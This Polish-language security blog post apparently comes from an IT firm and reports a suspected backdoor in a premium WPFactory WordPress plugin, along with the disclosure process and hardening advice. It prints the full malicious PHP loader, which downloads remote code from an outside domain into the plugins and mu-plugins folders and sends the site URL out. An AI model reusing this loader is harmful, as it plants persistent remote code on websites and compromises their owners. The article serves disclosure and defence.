Naruszenie bezpieczeństwa w serwisie WPFactory: narażonych zostało 170 000 witryn WordPress

| Aktualności |

WordPress pozostaje najczęściej używanym systemem zarządzania treścią na świecie, obsługującym ponad 40 procent wszystkich stron internetowych. Od witryn małych firm i osobistych blogów, po duże platformy korporacyjne i infrastruktury e-commerce, system ten stał się kręgosłupem współczesnego internetu. Jego popularność wynika z elastyczności, otwartego ekosystemu i ogromnej liczby dostępnych wtyczek rozszerzających jego funkcjonalność.

Jednak ten sam ekosystem stał się również jednym z największych wyzwań bezpieczeństwa WordPressa.

W Ferber Enterprises nasz zespół ds. cyberbezpieczeństwa nieustannie monitoruje zagrożenia dotykające ekosystem WordPressa, ponieważ luki w zabezpieczeniach wtyczek, motywów lub łańcuchów dostaw mogą szybko przerodzić się w ataki na dużą skalę, dotykające tysiące stron internetowych na całym świecie. W ostatnich latach cyberprzestępcy coraz częściej atakują twórców wtyczek i infrastrukturę dystrybucyjną zamiast poszczególnych stron internetowych, co pozwala złośliwemu kodowi rozprzestrzeniać się poprzez zaufane aktualizacje oprogramowania i oficjalne kanały pobierania.

W tym tygodniu wybuchła poważna kontrowersja dotycząca firmy WPFactory, znanego twórcy wtyczek WordPressa, którego produkty są zainstalowane na ponad 170 000 stron internetowych na całym świecie. Ponad 80 wtyczek powiązanych z tą firmą zostało tymczasowo wyłączonych na WordPress.org po tym, jak nasz zespół ds. cyberbezpieczeństwa w WPFactory wykrył podejrzane tylne drzwi w wersji premium jednej z jej wtyczek.

Incydent wzbudził poważne obawy w społeczności WordPress dotyczące bezpieczeństwa łańcucha dostaw oprogramowania, procesów przeglądu wtyczek oraz rosnącego wyrafinowania ataków skierowanych na ekosystem open-source.

Odkrycie podejrzanego zachowania wtyczki

Problem wyszedł na jaw po tym, jak nasz zespół ds. cyberbezpieczeństwa w Ferber Enterprises zauważył nieprawidłowości podczas testowania wersji premium wtyczki „EU VAT for WooCommerce Pro”, udostępnianej bezpośrednio na jej oficjalnej stronie internetowej.

Pierwotnie śledztwo rozpoczęło się po tym, jak wtyczka wygenerowała krytyczny błąd podczas instalacji. Podczas rozwiązywania problemu nasi analitycy zidentyfikowali podejrzany plik PHP o nazwie class-alg-wc-eu-vat-customer.php. Plik ten wydawał się wykonywać działania całkowicie niezgodne z oczekiwaną funkcjonalnością wtyczki WooCommerce VAT.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Zgodnie z naszą analizą, kod próbował:

  • Pobierz zewnętrzny archiwum ZIP z zdalnego serwera
  • Modyfikowanie katalogów rdzennych WordPressa
  • Komunikuj się z infrastrukturą zewnętrzną
  • Potencjalne wykonanie zdalnych ładunków na zaatakowanych stronach internetowych

Te wskaźniki natychmiast zasugerowały możliwe istnienie ukrytego tylnego wejścia lub szkodliwego naruszenia łańcucha dostaw.

Sytuację czyniło szczególnie niepokojącą to, że wtyczka nie pochodziła z nieoficjalnego serwera lustrzanego ani z pirackiego repozytorium. Pakiet został pobrany bezpośrednio z oficjalnego portalu klienta WPFactory, co wzmogło obawy, że sam kanał dystrybucji mógł zostać naruszony.

W Ferber Enterprises natychmiast udokumentowaliśmy ten incydent i rozpoczęliśmy proces odpowiedzialnego ujawniania, kontaktując się bezpośrednio z WPFactory za pośrednictwem serwisu GitHub.

Wstępna odpowiedź od WPFactory

Firma WPFactory początkowo stwierdziła, że podejrzany plik i zachowanie opisane w zgłoszeniu nie były częścią jej oficjalnego kodu źródłowego.

Przedstawiciel firmy zasugerował kilka alternatywnych wyjaśnień, między innymi:

  • Zmodyfikowana lokalna instalacja
  • Skompromitowane środowisko strony internetowej
  • Nieaktualna wersja wtyczki
  • Potencjalnie zmodyfikowane źródło pobierania

Firma podała również, że nie była w stanie bezpiecznie sprawdzić dostarczonego pliku ZIP, ponieważ przeglądarka oznaczyła archiwum jako potencjalnie niebezpieczne.

Nasz zespół ds. cyberbezpieczeństwa wyjaśnił następnie, że wtyczka została pobrana bezpośrednio z oficjalnej strony internetowej WPFactory oraz że podejrzany plik pozostał w systemie nawet po pobraniu nowej kopii wersji 4.6.1 z tego samego źródła.

Ten szczegół stał się kluczowym elementem śledztwa. Jeśli wiele niezależnych pobrań z oficjalnego kanału dystrybucji konsekwentnie zawierało ten sam podejrzany kod, prawdopodobieństwo włamania do lokalnej strony internetowej stawało się coraz mniej realne. Pomimo tych ustaleń firma WPFactory początkowo oświadczyła, że nie jest w stanie odtworzyć tego problemu po swojej stronie, i twierdziła, że podejrzany plik nie występuje w oficjalnym pakiecie wtyczki.

Następnie firma zwróciła się z prośbą o przyznanie uprawnień administratora oraz dostępu FTP do danego środowiska w celu kontynuowania dochodzenia. W Ferber Enterprises odrzuciliśmy tę prośbę ze względów bezpieczeństwa cybernetycznego. Przyznanie uprzywilejowanego dostępu do serwera dostawcy, którego infrastruktura mogła sama ulec naruszeniu, stanowiłoby niedopuszczalne zagrożenie dla bezpieczeństwa. Zamiast tego nasz zespół nadal dostarczał dowody techniczne, w tym nagranie wideo pokazujące podejrzane zachowanie wtyczki występujące bezpośrednio po jej instalacji.

Eskalacja na WordPress.org

W miarę postępów śledztwa narastały obawy dotyczące potencjalnego zasięgu problemu. Firma WPFactory posiada bogatą ofertę wtyczek, obejmującą ponad 65 pozycji, które łącznie mają ponad 170 000 aktywnych instalacji. Wszelkie naruszenie bezpieczeństwa infrastruktury dystrybucyjnej firmy mogłoby zatem mieć daleko idące konsekwencje dla całego ekosystemu WordPressa.

Nasz zespół zgłosił tę sprawę bezpośrednio do serwisu WordPress.org, aby zapobiec instalacji potencjalnie zainfekowanych pakietów przez kolejnych użytkowników w trakcie trwania dochodzenia. W rezultacie serwis WordPress.org podjął nadzwyczajną decyzję o tymczasowym wyłączeniu dostępu do ponad 80 wtyczek WPFactory w oficjalnym repozytorium.

Posunięcie to natychmiast wzbudziło zainteresowanie całej społeczności zajmującej się bezpieczeństwem WordPressa, ponieważ masowe wyłączanie wtyczek na taką skalę zdarza się stosunkowo rzadko i zazwyczaj wskazuje na poważne, nierozwiązane problemy. W następstwie eskalacji sytuacji firma WPFactory potwierdziła później, że zgłoszona kwestia wydaje się uzasadniona, i przeprosiła za to, że nie zareagowała szybciej na pierwsze zgłoszenie. Przedstawiciele firmy oświadczyli, że aktywnie badają sprawę i pracują nad jej rozwiązaniem. Jedna z hipotez wysuniętych wewnętrznie przez WPFactory sugerowała, że przestarzały lub zapisany w pamięci podręcznej pakiet wtyczki mógł zostać nieumyślnie udostępniony za pośrednictwem ich infrastruktury.

Jednak nasz zespół ds. cyberbezpieczeństwa nie zgodził się z tą oceną. Obserwowane zachowanie silnie wskazywało na głębszy problem bezpieczeństwa, potencjalnie obejmujący naruszone potoki budowania, systemy dystrybucji lub nieautoryzowane wstrzyknięcie kodu w pobieralnych archiwach wtyczek.

Dlaczego to zdarzenie ma znaczenie

Sprawa WPFactory uwidacznia rosnące zagrożenie dla cyberbezpieczeństwa znane jako atak na łańcuch dostaw oprogramowania. Dawniej atakujący skupiali się na przejmowaniu kontroli nad poszczególnymi stronami internetowymi bezpośrednio poprzez ataki typu brute force lub wykorzystując luki w wtyczkach. Obecnie cyberprzestępcy coraz częściej atakują samych dostawców oprogramowania, ponieważ przejęcie kontroli nad zaufanym dostawcą pozwala na rozprzestrzenianie się złośliwego kodu na tysiącach stron internetowych jednocześnie.

Tę strategię obserwowano już w kilku głośnych incydentach w zakresie cyberbezpieczeństwa, które dotknęły globalne ekosystemy oprogramowania w ciągu ostatniej dekady. Konkretnie w ekosystemie WordPress, twórcy wtyczek stanowią atrakcyjne cele, ponieważ wtyczki są z natury ufane przez administratorów i często działają z podwyższonymi uprawnieniami.

Jeśli złośliwy kod zostanie wprowadzony do pakietu wtyczki dystrybuowanego za pośrednictwem oficjalnego kanału, strony internetowe, których to dotyczy, mogą nieświadomie zainstalować złośliwe oprogramowanie. W przypadku podejrzanej wtyczki WPFactory potencjalne konsekwencje są poważne.

Na podstawie naszej analizy zidentyfikowane zachowanie teoretycznie mogłoby pozwolić atakującym na:

  • Wdróż dodatkowe złośliwe oprogramowanie
  • Wstrzyknij spam SEO
  • Stwórz trwałe tylne furtki
  • Wyniesienie poufnych danych
  • Zarządzaj instalacjami WordPress zdalnie
  • Utrzymywać nieautoryzowany dostęp przez dłuższy czas

Niebezpieczeństwo takich ataków polega na ich podstępności. Nowoczesne backdoory często są zaprojektowane tak, aby pozostawać uśpione przez miesiące przed aktywacją, co znacznie utrudnia ich wykrycie. Na początku tego miesiąca zespół WordPress Plugins zamknął podobno ponad 30 wtyczek po tym, jak ukryty złośliwy kod osadzony w innym portfolio wtyczek pozostawał nieaktywny przez około osiem miesięcy, zanim ostatecznie się aktywował i wstrzyknął spam SEO na strony internetowe.

Ten trend pokazuje, że atakujący coraz częściej priorytetowo traktują utrwalanie i opóźnione aktywowanie w celu uniknięcia mechanizmów wykrywania.

Szerszy kryzys bezpieczeństwa w ekosystemie WordPress

Incydent związany z wtyczką WPFactory ujawnia również szersze, systemowe wyzwania związane z bezpieczeństwem, które dotyczą całego środowiska WordPress. W ciągu ostatniej dekady ekosystem wtyczek znacznie się rozrósł – obecnie na oficjalnych i komercyjnych platformach dostępnych jest dziesiątki tysięcy wtyczek. Chociaż ekosystem ten sprzyja innowacyjności i elastyczności, powoduje również ogromne trudności w zakresie nadzoru nad bezpieczeństwem.

Według raportu Patchstacka “Stan bezpieczeństwa WordPressa w 2026 r.” prawie 461 000 znanych luk w zabezpieczeniach nie zostało załatanych przed ich upublicznieniem. Statystyka ta odzwierciedla rosnące obciążenie, z jakim borykają się zarówno twórcy wtyczek, badacze zajmujący się bezpieczeństwem, jak i administratorzy repozytoriów.

Jednocześnie oficjalna kolejka przeglądu wtyczek WordPress podobno przekracza już 4000 wtyczek oczekujących na sprawdzenie. Takie liczby ilustrują ogromne wyzwanie związane z zapewnieniem jakości i audytem bezpieczeństwa na dużą skalę.

Wielu twórców wtyczek to niewielkie zespoły dysponujące ograniczonymi zasobami w zakresie bezpieczeństwa. Inni zarządzają jednocześnie dziesiątkami wtyczek, realizując jednocześnie agresywne strategie rozwoju biznesowego obejmujące przejęcia i poszerzanie portfolio. Sama firma WPFactory niedawno rozszerzyła swoją działalność poprzez przejęcia, w tym zakup Extend-WP wraz z 19 wtyczkami w 2025 roku, a następnie przejęcie WBW i kilku dodatkowych wtyczek w tym samym roku.

Szybkie rozszerzanie portfolio może generować złożoność operacyjną, która utrudnia audyt kodu, zarządzanie infrastrukturą i weryfikację integralności wydawniczej. Atakujący są doskonale świadomi tych realiów. Coraz częściej skupiają się na wykorzystywaniu słabych praktyk w zakresie bezpieczeństwa operacyjnego u dostawców oprogramowania, zamiast bezpośrednio atakować użytkowników końcowych.

Rosnące znaczenie bezpieczeństwa łańcucha dostaw

Incydenty takie jak ten wzmacniają pilną potrzebę wdrożenia silniejszych praktyk bezpieczeństwa w łańcuchu dostaw w całym ekosystemie WordPress.

W Ferber Enterprises nasz zespół ds. cyberbezpieczeństwa zdecydowanie zaleca twórcom wtyczek wdrożenie kilku kluczowych zabezpieczeń, w tym:

  • Kryptograficzne podpisywanie pakietów
  • Bezpieczne potoki CI/CD
  • Obowiązkowe uwierzytelnianie wieloskładnikowe
  • Segmentacja infrastruktury
  • Ciągłe monitorowanie integralności
  • Niezależne audyty kodu
  • Powtarzalne systemy budowania

Administratorzy stron internetowych powinni również wzmocnić swoją własną postawę bezpieczeństwa. Nawet wtyczek pobranych z oficjalnych lub zaufanych źródeł nie należy zakładać, że są one z natury bezpieczne.

Organizacje zarządzające krytyczną infrastrukturą WordPress powinny rozważyć:

  • Utrzymanie środowisk stagingowych
  • Monitorowanie ruchu wychodzącego
  • Skanowanie wtyczek przed wdrożeniem
  • Ograniczanie użycia wtyczek
  • Stosowanie kontroli dostępu o najmniejszych uprawnieniach
  • Implementacja monitorowania integralności plików
  • Korzystanie z zarządzanych zapór sieciowych aplikacji internetowych (WAF)

W środowiskach korporacyjnych walidacja łańcucha dostaw staje się równie ważna, jak tradycyjne zarządzanie podatnościami. Założenie, że oficjalne kanały dystrybucji oprogramowania są zawsze bezpieczne, nie jest już realistyczne w dzisiejszym krajobrazie zagrożeń.

Reakcje Społeczności i Trwające Śledztwo

Kontrowersje szybko rozprzestrzeniły się w społeczności WordPressa, gdy deweloperzy, badacze ds. bezpieczeństwa i dostawcy infrastruktury zaczęli publicznie dyskutować na ten temat.

Kilka znanych postaci z ekosystemu nagłośniło sprawę, w tym deweloperzy, którzy publikowali listy tymczasowo zamkniętych wtyczek i zachęcali administratorów do audytu ich środowisk.

W międzyczasie nasz zespół w Ferber Enterprises kontynuuje analizę podejrzanych próbek wtyczek oraz monitoruje sytuację pod kątem kolejnych oznak naruszenia bezpieczeństwa, które mogą mieć wpływ na strony internetowe oparte na WordPressie na całym świecie.

W momencie publikacji firma WPFactory potwierdziła istnienie problemu i oświadczyła, że aktywnie pracuje nad jego rozwiązaniem.

Jednakże wiele pytań pozostaje bez odpowiedzi:

  • Czy oficjalna infrastruktura dystrybucyjna została skompromitowana?
  • Jak długo potencjalnie dystrybuowano złośliwe pakiety?
  • Czy dodatkowe wtyczki zostały naruszone?
  • Czy konta klientów lub systemy pobierania danych zostały naruszone?
  • Czy atakujący uzyskali trwały dostęp do wewnętrznej infrastruktury?
  • Czy wciąż mogą istnieć dodatkowe uśpione ładunki?

Dopóki te pytania nie zostaną w pełni rozwiązane, ostrożność pozostaje kluczowa.

Przyszłość bezpieczeństwa WordPress

Incydent związany z WPFactory może ostatecznie stać się kolejnym charakterystycznym przykładem wyzwań w zakresie cyberbezpieczeństwa, przed którymi stoi ekosystem internetowy oparty na oprogramowaniu open source.

WordPress napędza ogromną część globalnej gospodarki internetowej. Każde naruszenie bezpieczeństwa na dużą skalę, dotyczące deweloperów wtyczek, może zatem mieć konsekwencje wykraczające daleko poza pojedyncze strony internetowe.

W miarę jak atakujący coraz częściej wykorzystują luki w łańcuchu dostaw i stosują techniki ukrytej persystencji, bezpieczeństwo wtyczek nie może już być traktowane jako kwestia drugorzędna. W Ferber Enterprises uważamy, że to wydarzenie stanowi istotne przypomnienie, iż cyberbezpieczeństwo to nie tylko ochrona samych stron internetowych, ale także zabezpieczenie każdej warstwy łańcucha dystrybucji oprogramowania.

Zaufanie w otwartych ekosystemach zależy od przejrzystości, szybkiego reagowania na incydenty i stosowania silnych praktyk bezpieczeństwa operacyjnego. Ekosystem WordPress stoi teraz w obliczu ważnego momentu.

To, jak deweloperzy, opiekunowie repozytoriów, dostawcy hostingu i zespoły ds. bezpieczeństwa zareagują na incydenty tego typu, pomoże określić, czy WordPress będzie nadal cieszył się zaufaniem milionów firm i organizacji, które polegają na nim każdego dnia.